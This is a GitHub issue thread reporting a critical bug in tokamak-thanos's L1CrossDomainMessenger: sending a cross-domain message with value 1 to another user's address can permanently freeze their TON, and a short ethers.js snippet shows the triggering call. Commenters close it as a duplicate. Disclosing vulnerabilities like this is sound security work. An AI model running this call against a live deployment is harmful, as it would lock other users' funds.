### ISSUE TITLE
Permanent freezing of someone's TON in L1CrossDomainMessenger

### ISSUE THREAD

**Issue by Zena-park** [tokamak-network/tokamak-thanos#246]
**Describe the bug**

We can lock someone's TON in L1CrossDomainMessenger by setting their allowance amount in L1CrossDomainMessenger to 1.
```
    const sendTx = await (
        await l2CrossDomainMessengerContract
        .connect(l2Wallet)
        .sendMessage(someoneWallet, '0x', 200000, { value: 1 })
    ).wait()
```

**Configuration**

Severity: CRITICAL

**Impact**

Permanent freezing of funds

**Comment by nguyenzung** [comment]
I think we are discussing the same on https://github.com/tokamak-network/tokamak-thanos/issues/243

**Comment by suahnkim** [comment]
@Zena-park if this is an duplicate issue as @nguyenzung mentioned, can you close it? or if you think it is not, leave a comment?

**Comment by Zena-park** [comment]
Yes, that's the same thing.
I'll close the issue.
